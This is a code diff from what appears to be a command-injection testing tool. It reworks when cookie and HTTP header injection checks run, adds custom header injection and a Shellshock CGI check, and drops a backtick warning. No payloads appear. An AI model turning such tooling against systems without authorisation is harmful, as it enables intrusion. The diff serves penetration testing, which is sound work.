-      if settings.TESTABLE_PARAMETERS_LIST or not settings.INJECTION_MARKER_LOCATION.COOKIE and settings.INJECTION_LEVEL == settings.COOKIE_INJECTION_LEVEL:
-      # if settings.TESTABLE_PARAMETERS_LIST or not settings.INJECTION_MARKER_LOCATION.COOKIE and settings.INJECTION_LEVEL == settings.COOKIE_INJECTION_LEVEL:
+
+    if proceed_non_custom:
+      # Determine if we should perform cookie-based injection checks.
+      cookie_check = (settings.TESTABLE_PARAMETERS_LIST or \
+                      not settings.INJECTION_MARKER_LOCATION.COOKIE) and \
+                      settings.INJECTION_LEVEL >= settings.COOKIE_INJECTION_LEVEL
+      if cookie_check:
         settings.COOKIE_INJECTION = True
         cookies_checks(url, http_request_method, filename, timesec)
-      if settings.TESTABLE_PARAMETERS_LIST or not settings.INJECTION_MARKER_LOCATION.HTTP_HEADERS and settings.INJECTION_LEVEL == settings.HTTP_HEADER_INJECTION_LEVEL:
-      # if settings.TESTABLE_PARAMETERS_LIST or not settings.INJECTION_MARKER_LOCATION.HTTP_HEADERS and settings.INJECTION_LEVEL == settings.HTTP_HEADER_INJECTION_LEVEL:
+
+      # Prepare headers list to evaluate whether header injection should be attempted.
+      testable = settings.TESTABLE_PARAMETERS_LIST
+      if isinstance(testable, str):
+        testable = [testable]
+        
+      testable_lower = [t.lower() for t in testable if isinstance(t, str)]
+
+      header_flags = [
+        settings.USER_AGENT,
+        settings.REFERER,
+        settings.HOST
+      ]
+
+      # Check if any header flag is within the testable parameters list.
+      header_found = any(isinstance(h, str) and \
+                         h.lower() in testable_lower for h in header_flags)
+
+      # Decide if header-based injection should be tested.
+      header_check = (settings.TESTABLE_PARAMETERS_LIST or \
+                      not settings.INJECTION_MARKER_LOCATION.HTTP_HEADERS) and \
+                      settings.INJECTION_LEVEL == settings.HTTP_HEADER_INJECTION_LEVEL or header_found
+
+      if header_check:
+        # Perform custom headers injection checks.
+        settings.CUSTOM_HEADER_INJECTION = True
+        custom_headers_checks(url, http_request_method, filename, timesec)
+
         settings.HTTP_HEADERS_INJECTION = True
         headers_checks(url, http_request_method, filename, timesec)
 
-  if settings.INJECTION_CHECKER == False:
-    return False
-  else:
-    return True
+  # Return True if injection checks are active/enabled, False otherwise.
+  return settings.INJECTION_CHECKER is not False
+
 
 """
 General check on every injection technique.
@@ -735,12 +873,8 @@ def do_check(url, http_request_method, filename):
         warn_msg += "time-based injections because of inherent high latency time."
         settings.print_data_to_stdout(settings.print_warning_msg(warn_msg))
 
-    # Check for "backticks" tamper script.
-    if settings.USE_BACKTICKS == True:
-      if not menu.options.tech or "e" in menu.options.tech or "t" in menu.options.tech or "f" in menu.options.tech:
-        warn_msg = "Commands substitution using backtics is only supported by the (results-based) classic command injection technique. "
-        settings.print_data_to_stdout(settings.print_warning_msg(warn_msg))
-
+    # Check target URL for CGI scripts vulnerable to Shellshock.
+    checks.check_CGI_scripts(url)
     perform_checks(url, http_request_method, filename)
       
     # All injection techniques seems to be failed!
